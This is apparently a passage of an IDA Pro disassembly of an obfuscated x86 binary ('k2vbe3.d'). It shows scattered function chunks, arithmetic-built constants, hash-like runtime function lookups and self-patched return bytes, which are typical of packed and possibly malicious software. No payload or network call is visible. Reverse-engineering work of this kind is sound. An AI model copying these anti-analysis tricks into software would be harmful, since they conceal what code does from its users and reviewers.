loc_442AB4:				; CODE XREF: sub_454EDD:loc_4507D9j
		or	edi, 0F130B046h
		rol	edi, 12h
		xor	edi, 0E25AD0A4h
		add	edi, ebp
		add	edi, 0E23EE172h
		mov	edi, [edi]
		jmp	loc_43E297
; END OF FUNCTION CHUNK	FOR sub_454EDD
; ---------------------------------------------------------------------------

loc_442AD2:				; CODE XREF: k2vbe3.d:0044BF42j
		lea	eax, nullsub_520
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_520
; ---------------------------------------------------------------------------

loc_442AE0:				; CODE XREF: k2vbe3.d:0043CAE1j
		call	sub_43CCDC
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_442AE5:				; CODE XREF: sub_444D7B-1564j
		jmp	loc_44E15D
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BECA

loc_442AEA:				; CODE XREF: sub_44BECA:loc_43FA8Aj
		mov	eax, 0DA4431C0h
		call	sub_4553CC
		mov	ds:off_41E0B0, eax
		call	sub_45329B

loc_442AFF:				; CODE XREF: sub_441AE3:loc_44DA65j
		and	eax, 7B86D3D7h
		xor	eax, 3698A215h
		call	sub_43C82E
		mov	ds:off_41E1F0, eax
		lea	eax, loc_458EC1
		mov	byte ptr [eax],	0C3h
		jmp	loc_447C8A
; END OF FUNCTION CHUNK	FOR sub_44BECA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_442B24:				; CODE XREF: sub_440C94-1780j
		jg	nullsub_34
		sub	edx, 50E31789h
		jmp	loc_440DAF
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_442B35:				; CODE XREF: sub_44B870-4AFCj
		sub	edi, esi
		xor	esi, 26921592h
		js	loc_458E43
		jmp	loc_454935
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_442B48:				; CODE XREF: sub_44D59D-698Dj
		jz	loc_45996F
		jmp	loc_44768D
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------
		push	edi
		push	0BC9AAE4Ah
		pop	edi
		add	edi, 6D0F8EA3h
		xor	edi, 0CBCC63EEh
		and	edi, 85AD19D0h

loc_442B6C:				; CODE XREF: k2vbe3.d:loc_455CF3j
		test	edi, 10000h
		jmp	loc_4428C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_442B77:				; CODE XREF: sub_45101A:loc_449E2Bj
		jnz	loc_448292
		jmp	loc_45764F
; END OF FUNCTION CHUNK	FOR sub_45101A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_442B82:				; CODE XREF: sub_456C15-18EC6j
		xor	edi, esi
		adc	edi, eax
		cmp	eax, 17257C2Dh
		jmp	loc_44E8D2
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443012

loc_442B91:				; CODE XREF: sub_443012+Aj
		add	edi, 7BE7048Ch
		sub	edi, 0A38DF274h
		add	edi, 63ABCABCh
		add	edi, ebp
; END OF FUNCTION CHUNK	FOR sub_443012
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_442BA5:				; CODE XREF: sub_43F7AC:loc_44BE1Aj
		add	edi, 5A1D98B6h
		mov	[edi], eax
		pop	edi
		push	edi
		jmp	loc_4529DD
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_442BB4:				; CODE XREF: sub_45451C+17j
		or	eax, 0EB1497DFh
		add	eax, 8E0FB1h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_4449A7
		jmp	loc_44EA1F
; END OF FUNCTION CHUNK	FOR sub_45451C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_117. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A634

loc_442BD0:				; CODE XREF: sub_45A634-37BAj
		push	0
		push	10h
		push	622712B7h
		pop	eax
		or	eax, 72C794FCh
		and	eax, 0FCEC27Fh
		rol	eax, 0Dh
		jmp	loc_44A9EC
; END OF FUNCTION CHUNK	FOR sub_45A634
; ---------------------------------------------------------------------------

loc_442BEE:				; CODE XREF: k2vbe3.d:0045B2BFj
		xchg	edi, [esp]
		push	0DD5D2422h
		xchg	esi, [esp]
		mov	ebx, esi
		pop	esi
		jmp	loc_44A2BF
; ---------------------------------------------------------------------------
		adc	eax, 0E7C93AF9h
		jmp	loc_447A7E
; ---------------------------------------------------------------------------

loc_442C0C:				; CODE XREF: k2vbe3.d:004413BFj
		add	ebx, 0E633AC25h
		or	ebx, 0E4BF1D01h
		push	offset sub_44EADF
		jmp	loc_444F34

; =============== S U B	R O U T	I N E =======================================



sub_442C22	proc near		; CODE XREF: sub_4506C3:loc_43C9C1p
					; k2vbe3.d:00448619j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C4D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D4DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EA43 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044156C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448A92 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00449C87 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E44B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450E2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452705 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045477B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00456D61 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458C5F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458D03 SIZE 00000013 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, ds:dword_455820
		or	eax, eax
		jnz	loc_43F6DA
		jmp	loc_43C4D7
sub_442C22	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_442C39:				; CODE XREF: sub_440C94+DA63j
		adc	ebp, 79A5DFE9h
		add	edi, 0B279F057h
		or	esi, 191EA717h
		jmp	loc_44EF65
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_442C50:				; CODE XREF: sub_43FF59:loc_4530A7j
		jnz	loc_4480CA
		jmp	loc_44678D
; END OF FUNCTION CHUNK	FOR sub_43FF59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_442C5B:				; CODE XREF: sub_443FC1-58BFj
		mov	byte ptr [eax+edx], 0
		call	sub_440621

loc_442C64:				; CODE XREF: sub_455CFE+Dj
		jmp	sub_445FE0
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_442C69:				; CODE XREF: sub_4582DD-8B74j
		jmp	loc_443494
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------

loc_442C6E:				; CODE XREF: k2vbe3.d:0043C309j
		jmp	loc_459007
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_440. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A306

loc_442C74:				; CODE XREF: sub_44A306+19j
		jmp	loc_45AABD
; END OF FUNCTION CHUNK	FOR sub_44A306
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4410AE

loc_442C79:				; CODE XREF: sub_4410AE+Cj
		jmp	loc_450264
; END OF FUNCTION CHUNK	FOR sub_4410AE

; =============== S U B	R O U T	I N E =======================================



sub_442C7E	proc near		; CODE XREF: sub_44471B+20Aj
					; sub_45A323+9p
		xchg	eax, [esp+0]
		pop	eax
		push	esi
		mov	esi, ecx
		push	offset loc_458181
		jmp	locret_45A3C8
sub_442C7E	endp

; ---------------------------------------------------------------------------

loc_442C8F:				; CODE XREF: k2vbe3.d:0044B42Ej
		mov	byte ptr [eax],	0C3h
		jmp	loc_459286

; =============== S U B	R O U T	I N E =======================================



sub_442C97	proc near		; CODE XREF: sub_4198C0+BBp
					; sub_442C97+5j
					; DATA XREF: ...
		call	sub_442CA7
		jmp	ds:off_41E200
sub_442C97	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_442CA2:				; CODE XREF: sub_44D59D+C3DFj
		jmp	loc_453B29
; END OF FUNCTION CHUNK	FOR sub_44D59D

; =============== S U B	R O U T	I N E =======================================



sub_442CA7	proc near		; CODE XREF: sub_442C97p
					; sub_456666-6D25j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044BDAC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450690 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00454267 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00455D16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045601E SIZE 00000025 BYTES
; FUNCTION CHUNK AT 004578CD SIZE 0000000A BYTES

		pop	edx
		jo	loc_454267
		jmp	loc_455D16
sub_442CA7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_442CB3:				; CODE XREF: sub_447692-325Aj
		and	ebx, esi

loc_442CB5:				; CODE XREF: sub_447692:loc_444430j
		sub	ecx, 0DA512349h
		add	ecx, 27BBE737h
		xchg	ecx, [esp+8+var_8]
		jmp	loc_44AC0E
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------

loc_442CC9:				; DATA XREF: sub_442F31+8C0o
		mov	edx, eax
		push	offset sub_445F22
		jmp	locret_4483A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458019

loc_442CD5:				; CODE XREF: sub_458019-EC61j
		rol	ebp, 1

loc_442CD7:				; CODE XREF: sub_458019:loc_44F525j
		push	offset loc_44AC5D
		jmp	loc_45860A
; END OF FUNCTION CHUNK	FOR sub_458019
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_442CE1:				; CODE XREF: sub_45B20A-D34Cj
		jz	loc_44E2D2
		jmp	loc_444D99
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_442CEC:				; CODE XREF: sub_44E90D:loc_449A28j
		mov	ebp, eax
		pop	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_442CF0:				; CODE XREF: sub_45AD42+19j
		jmp	loc_455879
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45890F

loc_442CF5:				; CODE XREF: sub_45890F+120Bj
		jmp	loc_441479
; END OF FUNCTION CHUNK	FOR sub_45890F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455500

loc_442CFA:				; CODE XREF: sub_455500-1387Aj
		jmp	loc_44CE56
; END OF FUNCTION CHUNK	FOR sub_455500
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_442CFF:				; CODE XREF: sub_43DFE1-1BEEj
		jmp	loc_459EC1
; END OF FUNCTION CHUNK	FOR sub_43DFE1

; =============== S U B	R O U T	I N E =======================================



sub_442D04	proc near		; CODE XREF: k2vbe3.d:0043F312p
					; sub_443F0D-487Cp ...

; FUNCTION CHUNK AT 0043FE59 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A9DC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00450E21 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458341 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B0A1 SIZE 0000001D BYTES

		push	ebp
		jmp	loc_43FE59
sub_442D04	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_442D0A:				; CODE XREF: sub_45B4EE:loc_44D9EEj
		jz	loc_43F6FF
		jmp	loc_43CEEB
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_442D15:				; CODE XREF: sub_43EEC6+14F1Cj
		push	8791E12Dh
		adc	ebx, 4CF9CB1Fh
		push	6DAF6F83h

loc_442D25:				; CODE XREF: sub_43EEC6:loc_444CACj
		push	0E1E5629Fh

loc_442D2A:				; CODE XREF: k2vbe3.d:loc_44BB80j
		pop	eax

loc_442D2B:				; CODE XREF: k2vbe3.d:004493FDj
		xor	eax, 5396FB6Bh
		jmp	loc_447DF3
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------
		pop	eax
		adc	esi, 0E7C94028h
		jmp	sub_457E9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_442D42:				; CODE XREF: sub_44866A-4424j
		jnz	loc_4561AD
		test	ecx, esi
		jmp	loc_448C42
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------
		popf
		jmp	sub_44A641
; ---------------------------------------------------------------------------

loc_442D55:				; CODE XREF: k2vbe3.d:0045656Cj
		pop	eax
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_442D56:				; CODE XREF: sub_43DFE1+18575j
		add	eax, 852A3Bh
		xchg	eax, [esp-4+arg_0]
		jmp	loc_44C3A5
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_442D64:				; CODE XREF: sub_447E07:loc_4518ECj
		rol	eax, 9
		xor	eax, 0EE1851A2h
; END OF FUNCTION CHUNK	FOR sub_447E07
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_442D6D:				; CODE XREF: sub_4426DF+4AE8j
		push	esi
		push	80A9A00Bh
		pop	esi
		sub	esi, 5AEFC4CCh
		jmp	loc_451653
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_442D7F:				; CODE XREF: sub_44D298-3683j
		push	offset loc_4591BD
		jmp	nullsub_81
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------

loc_442D89:				; CODE XREF: k2vbe3.d:loc_4482B5j
		jz	loc_44C3D8
		jmp	loc_44DD26
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 0Dh
		mov	ds:dword_444F3C, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_442D9F:				; CODE XREF: sub_4479A1+528Aj
		jmp	loc_447355
; END OF FUNCTION CHUNK	FOR sub_4479A1

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_442DA4	proc near		; CODE XREF: sub_45BDE4j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044E0CF SIZE 00000011 BYTES

		push	ebp
		mov	ebp, esp
		push	ebx
		jmp	loc_44E0CF
sub_442DA4	endp

; ---------------------------------------------------------------------------

loc_442DAD:				; CODE XREF: k2vbe3.d:loc_44DA48j
		jl	loc_458846
		jp	loc_45522E
		mov	[ebx], esi
		jmp	loc_45883D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4541D3

loc_442DC0:				; CODE XREF: sub_4541D3:loc_453157j
		call	sub_45A2AF

loc_442DC5:				; CODE XREF: sub_45512F+677Bj
		jmp	loc_44BBE5
; END OF FUNCTION CHUNK	FOR sub_4541D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443CD9

loc_442DCA:				; CODE XREF: sub_443CD9+34ABj
		jmp	loc_449617
; END OF FUNCTION CHUNK	FOR sub_443CD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_442DCF:				; CODE XREF: sub_457580-CA24j
		push	8FD9249h

loc_442DD4:				; CODE XREF: sub_457580:loc_4561E3j
		call	sub_442DDF
		retn
; END OF FUNCTION CHUNK	FOR sub_457580
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_442DDA:				; CODE XREF: sub_44D0D5+DA93j
		jmp	loc_450548
; END OF FUNCTION CHUNK	FOR sub_44D0D5

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_442DDF	proc near		; CODE XREF: sub_457580:loc_442DD4p
					; k2vbe3.d:loc_44BD58p	...

; FUNCTION CHUNK AT 004411C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D6AD SIZE 0000000A BYTES

		push	ebp
		mov	ebp, esp
		jns	sub_45A4C1
		add	esp, 0FFFFFFE0h
		jmp	loc_4411C0
sub_442DDF	endp


; =============== S U B	R O U T	I N E =======================================



sub_442DF0	proc near		; CODE XREF: k2vbe3.d:0043CE04j
					; sub_44AFD4+6p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C5FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440599 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004408A3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00442F72 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00446EEE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044789B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448AF1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B786 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044BA93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CB9D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044E5B0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045039F SIZE 00000026 BYTES
; FUNCTION CHUNK AT 004514F0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045159A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004549A6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454A49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454BC9 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ebp
		mov	ebp, esp
		mov	esp, ebp
		jmp	loc_44B786
sub_442DF0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A306

loc_442DFE:				; CODE XREF: sub_44A306-26ECj
		adc	esi, 2A80C697h
		sub	esi, ebp
		jmp	loc_44F2D5
; END OF FUNCTION CHUNK	FOR sub_44A306
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_442E0B:				; CODE XREF: sub_45A323-3733j
		xor	edi, 0F9103FF2h
		jle	loc_45B82E
		jmp	loc_457556
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_442E1C:				; CODE XREF: sub_44B870j
		cmp	dword ptr [ebp-4], 3
		jnz	loc_457556
		jmp	loc_446D6E
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_442E2B:				; CODE XREF: sub_457D4B:loc_43CA00j
		jge	loc_44237C
		sub	ebx, 0B34AC8DAh
		jmp	loc_442378
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------

loc_442E3C:				; CODE XREF: k2vbe3.d:00455538j
		jns	loc_44F26C
; START	OF FUNCTION CHUNK FOR sub_446258

loc_442E42:				; CODE XREF: sub_446258:loc_45551Bj
		add	edi, 0BDE950B2h
		xchg	edi, [esp+0]
		jmp	loc_43CA6F
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_442E50:				; CODE XREF: sub_44F20A:loc_44D05Cj
					; sub_44F20A-21A1j
		xor	eax, 6AE3AD05h
		call	sub_4553CC
		mov	ds:dword_41E19C, eax
		lea	eax, nullsub_12
		mov	byte ptr [eax],	0C3h
		jmp	loc_45604E
; END OF FUNCTION CHUNK	FOR sub_44F20A
; ---------------------------------------------------------------------------
		xchg	edi, [esp]
		mov	edx, edi
		pop	edi
		jmp	loc_45B487
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A7C

loc_442E7A:				; CODE XREF: sub_450A7C+3D42j
		lea	eax, nullsub_498
		mov	byte ptr [eax],	0C3h
		jmp	loc_4466D8
; END OF FUNCTION CHUNK	FOR sub_450A7C
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		call	sub_44E481
		mov	eax, 8D800AAh
		push	edi
		jmp	loc_45118E
; ---------------------------------------------------------------------------
		jns	loc_44D027
		xor	ecx, 3B9E7356h
		jmp	sub_456AC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_442EAE:				; CODE XREF: sub_446478-4444j
		jbe	loc_449082
		xor	esi, ebp
		jmp	loc_4503C5
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_442EBB:				; CODE XREF: sub_45A323:loc_45A37Cj
		jz	loc_457793
		jmp	loc_43E519
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_442EC6:				; CODE XREF: k2vbe3.d:00450ED6j
		xchg	esi, [esp]
		push	offset loc_45C0E5
		jmp	loc_45AD86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_442ED3:				; CODE XREF: sub_43CCD0:loc_4501EBj
		xchg	ecx, [esp+4+var_4]
		push	esi
		push	2398E895h
		sbb	esi, ebp
		jmp	loc_446572
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

locret_442EE3:				; CODE XREF: k2vbe3.d:0043CE31j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_442EE4:				; CODE XREF: sub_457580-F627j
		jmp	loc_4556FE
; END OF FUNCTION CHUNK	FOR sub_457580
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_442EE9:				; CODE XREF: sub_445124+14j
		jmp	loc_4461ED
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_442EEE:				; CODE XREF: sub_451CF1-DBD8j
					; sub_451CF1:loc_450053j
		rol	esi, 1Ch
		and	esi, 54AFAAA4h
		test	esi, 200000h
		jmp	loc_457CFB
; END OF FUNCTION CHUNK	FOR sub_451CF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_442F02:				; CODE XREF: sub_44B999+4403j
		rol	ecx, 10h
		ja	loc_456147
		test	edx, 0B8FCC527h
		jmp	loc_43FBED
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_442F16:				; CODE XREF: sub_44945C-CFj
					; sub_44945C:loc_44DE8Ej
		call	sub_44032C
		jge	loc_43CAF5
		jmp	loc_448153
; END OF FUNCTION CHUNK	FOR sub_44945C
; ---------------------------------------------------------------------------

loc_442F26:				; CODE XREF: k2vbe3.d:loc_446531j
		jz	loc_4463B9
		jmp	loc_455CA8

; =============== S U B	R O U T	I N E =======================================



sub_442F31	proc near		; CODE XREF: k2vbe3.d:0044D882j
					; sub_44ECF3+Bp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004437F0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445FA3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446DF3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004483CC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044C0EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C17A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D209 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00457D95 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C0FB SIZE 0000000B BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_44C17A
		mov	eax, [ebp-4]
		jmp	loc_44C0EA
sub_442F31	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_442F4A:				; CODE XREF: k2vbe3.d:0044901Fj
		adc	ebp, esi

; =============== S U B	R O U T	I N E =======================================



sub_442F4C	proc near		; CODE XREF: k2vbe3.d:00459360p

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		add	eax, 98070FCEh
		xchg	eax, [esp-4+arg_0]
		jmp	sub_444B3E
sub_442F4C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_442F5E:				; CODE XREF: k2vbe3.d:0044DC27j
		jz	loc_45AA29

; =============== S U B	R O U T	I N E =======================================



sub_442F64	proc near		; CODE XREF: sub_44E299+6p

; FUNCTION CHUNK AT 00449B64 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B860 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BB16 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E4C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EC1E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004590AE SIZE 0000000C BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_44B860
sub_442F64	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_442F72:				; CODE XREF: sub_442DF0:loc_43C5FDj
		call	sub_4436CE
		mov	edx, 0B9726E5Ah
		call	sub_454225

loc_442F81:				; CODE XREF: sub_4588E6-143Dj
		jmp	loc_44E5B0
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C49B

loc_442F86:				; CODE XREF: sub_44C49B-2FF1j
		call	sub_4553CC
		push	offset loc_452D6D
		jmp	nullsub_357
; END OF FUNCTION CHUNK	FOR sub_44C49B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448AE2

loc_442F95:				; CODE XREF: sub_448AE2+268j
		popf
		sbb	edi, 0CC4F62FAh
		pop	ecx
		jmp	loc_44EFDB
; END OF FUNCTION CHUNK	FOR sub_448AE2
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 1Ah
		mov	ds:dword_43C798, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C927

loc_442FAD:				; CODE XREF: sub_43C927+19A5Aj
		rol	eax, 1Ah
		push	ebp
		jmp	loc_44468F
; END OF FUNCTION CHUNK	FOR sub_43C927

; =============== S U B	R O U T	I N E =======================================



sub_442FB6	proc near		; DATA XREF: sub_447ADA+5o

; FUNCTION CHUNK AT 0043CE53 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BE96 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044CD35 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00455D11 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		push	7B5EA80Eh
		pop	ebx
		xor	ebx, 0FF85DBEFh
		jmp	loc_455D11
sub_442FB6	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_433. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_442FCB:				; CODE XREF: sub_44D2F1+CC87j
		jmp	nullsub_444
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; ---------------------------------------------------------------------------

loc_442FD0:				; DATA XREF: sub_44AF54-9EB0o
		cmp	edx, 7C61090Eh
		jz	loc_4475B6
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_442FDC:				; CODE XREF: k2vbe3.d:loc_43D382j
					; sub_44AF54:loc_44108Bj ...
		jnb	loc_458E38
		or	eax, eax
		jz	loc_4475B4
		push	offset loc_458E28
		jmp	loc_449FDF
; END OF FUNCTION CHUNK	FOR sub_43FE2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_442FF4:				; CODE XREF: sub_44DAF6:loc_44DFD1j
		mov	al, [eax]
		jb	loc_45ABDF
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_457793
		jmp	loc_45B122
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; ---------------------------------------------------------------------------

loc_443010:				; CODE XREF: k2vbe3.d:00444ED5j
		mov	[edi], ebx

; =============== S U B	R O U T	I N E =======================================



sub_443012	proc near		; CODE XREF: sub_44C1FD+Cp

; FUNCTION CHUNK AT 00442B91 SIZE 00000014 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	69DD8A72h
		pop	edi
		jmp	loc_442B91
sub_443012	endp ; sp-analysis failed


